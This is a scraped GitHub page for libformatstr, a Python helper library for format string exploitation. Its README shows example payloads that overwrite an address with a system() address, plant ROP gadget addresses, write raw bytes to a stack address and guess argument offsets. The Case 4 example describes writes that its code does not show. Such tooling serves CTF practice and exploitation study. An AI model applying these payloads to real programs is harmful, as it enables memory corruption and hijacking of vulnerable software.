Simplify format string exploitation.
Python C Makefile
Switch branches/tags
Nothing to show
Clone or download
hellman Merge pull request #8 from unamer/master
Fix some errors in 64bit mode
Latest commit 71f9ac6 Jul 10, 2017
Failed to load latest commit information.
libformatstr fix some error in x64 mode May 11, 2017
selftest libformatstr selftest Feb 15, 2015 Update May 11, 2017 switch to MIT license Nov 20, 2015

Small script to simplify format string exploitation.


  • Case 1 - replace one dword:
import sys
from libformatstr import FormatStr

addr = 0x08049580
system_addr = 0x080489a3

p = FormatStr()
p[addr] = system_addr

# buf is 14th argument, 4 bytes are already printed
sys.stdout.write( p.payload(14, start_len=4) )
  • Case 2 - put ROP code somewhere:
import sys
from libformatstr import FormatStr

addr = 0x08049580
rop = [0x080487af, 0x0804873c, 0x080488de]
p = FormatStr()
p[addr] = rop

sys.stdout.write( p.payload(14) )
  • Case 3 - guess argument number and padding:
import sys
from libformatstr import FormatStr

# let's say we have do_fmt function,
# which gives us only output of format string
# (you can also just copy fmtstr and output manually)

buf_size = 250  # fix buf_size to avoid offset variation
res = do_fmt(make_pattern(buf_size))
argnum, padding = guess_argnum(res, buf_size)

# of course you can use it in payload generation

p = FormatStr(buf_size)
p[0xbffffe70] = "\x70\xfe\xff\xbf\xeb\xfe"  # yes, you can also put strings

sys.stdout.write( p.payload(argnum, padding, 3) ) # we know 3 bytes were printed already
  • Case 4 - write something in specificed order:
from libformatstr import FormatStr
f=FormatStr(autosort=False) #This option disables auto sorting

#The payload will write address 0x1234 first,then 0x5678,then 0xabcd.
  • Case 5 - while you are in amd64:
from libformatstr import FormatStr
f=FormatStr(isx64=1) #This option force script to use 64bit address while generating payload


Author: hellman ( )

License: MIT License ( )